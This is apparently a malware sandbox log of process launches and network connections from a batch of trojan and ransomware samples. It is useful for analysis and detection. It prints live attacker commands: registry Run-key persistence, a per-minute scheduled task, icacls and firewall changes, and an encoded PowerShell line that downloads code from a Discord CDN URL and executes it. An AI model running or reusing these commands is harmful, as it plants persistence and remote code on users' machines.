HEUR-Trojan.MSIL.Crypt.gen-615ae4e917dab894699846dc78a8c9daf07fcbe5f4ad06483b8a4a5bd17d9e4e.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-67476b6ffbd142ade3dd16f0f91673a04b0cd10262afea29bc20ddb26a087404.exe
HEUR-Trojan.MSIL.Crypt.gen-67476b6ffbd142ade3dd16f0f91673a04b0cd10262afea29bc20ddb26a087404.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-6a4dc64b7df47c9397fccb7f9cf098737cfff9747a8970c039e88d226ced69bd.exe
HEUR-Trojan.MSIL.Crypt.gen-6a4dc64b7df47c9397fccb7f9cf098737cfff9747a8970c039e88d226ced69bd.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-813797b7a9acf4262cf567f0cbe09ebd6be5d5c446ebe4fa5c147e7b94bf5ad4.exe
HEUR-Trojan.MSIL.Crypt.gen-813797b7a9acf4262cf567f0cbe09ebd6be5d5c446ebe4fa5c147e7b94bf5ad4.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-ade170d43b102f5e2910339388771eea6b75308124d4bfdb840672d522ad4596.exe
HEUR-Trojan.MSIL.Crypt.gen-ade170d43b102f5e2910339388771eea6b75308124d4bfdb840672d522ad4596.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c234fec6829e93fc69b390373b9d7bcea9ed5772f3674b842a4e943c3edbf320.exe
HEUR-Trojan.MSIL.Crypt.gen-c234fec6829e93fc69b390373b9d7bcea9ed5772f3674b842a4e943c3edbf320.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c260f2424f0df4e3c657bb98f5f7d6b87809421b85e84284215db3c254e7b1ef.exe
HEUR-Trojan.MSIL.Crypt.gen-c260f2424f0df4e3c657bb98f5f7d6b87809421b85e84284215db3c254e7b1ef.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c85da5228d681603c78ae24ac58f26c7eeb812eca581cc955db4de51d8442661.exe
HEUR-Trojan.MSIL.Crypt.gen-c85da5228d681603c78ae24ac58f26c7eeb812eca581cc955db4de51d8442661.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6424 -ip 6424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5764 -ip 5764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 852
C:\Users\Admin\AppData\Local\Temp\53e8df59-9b95-4af3-8955-1253b4c6949c.exe
"C:\Users\Admin\AppData\Local\Temp\53e8df59-9b95-4af3-8955-1253b4c6949c.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 1068
C:\Users\Admin\AppData\Local\Temp\b9119bd7-bed8-4618-b746-cf10336f7a3c.exe
"C:\Users\Admin\AppData\Local\Temp\b9119bd7-bed8-4618-b746-cf10336f7a3c.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7724 -ip 7724
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-db4f98133dd11d5b6a6e894c777bae318b8beb17effe21283ca133a39e461a3c.exe
HEUR-Trojan.MSIL.Crypt.gen-db4f98133dd11d5b6a6e894c777bae318b8beb17effe21283ca133a39e461a3c.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 1576
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM wscript.exe
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM cmd.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn NYAN /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn NYAN /tr "C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe" /sc minute /mo 1
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-e134a6c799de4a4705eebb7fd139c9c1b1f0a2e8b527e732ee7a40fdc5f49ee4.exe
HEUR-Trojan.MSIL.Crypt.gen-e134a6c799de4a4705eebb7fd139c9c1b1f0a2e8b527e732ee7a40fdc5f49ee4.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\16c1003b-816c-457b-b10c-d0fbd651148b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-ebaa163e986e04be1995759c109497df965f7b601eec73d3a280318b9f5c501d.exe
HEUR-Trojan.MSIL.Crypt.gen-ebaa163e986e04be1995759c109497df965f7b601eec73d3a280318b9f5c501d.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
"C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
"C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM wscript.exe
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM cmd.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn NYAN /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /sc minute /mo 1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Users\Admin\AppData\Roaming\model\print.exe
"C:\Users\Admin\AppData\Roaming\model\print.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe" "explorer.DLL.exe" ENABLE
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM wscript.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM cmd.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn NYAN /F
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /sc minute /mo 1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
C:\Users\Admin\Desktop\00486\Setup.exe
"C:\Users\Admin\Desktop\00486\Setup.exe"
C:\Users\Admin\Desktop\00486\smss.exe
"C:\Users\Admin\Desktop\00486\smss.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaf87746f8,0x7ffaf8774708,0x7ffaf8774718
C:\Users\Admin\AppData\Local\Temp\is-021EK.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-021EK.tmp\Setup.tmp" /SL5="$30784,3291817,140800,C:\Users\Admin\Desktop\00486\Setup.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com.tr | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 158.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | 244.244.23.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gist.githubusercontent.com | udp |
| US | 185.199.110.133:443 | gist.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | bossdata.pro | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 121.144.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.65.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
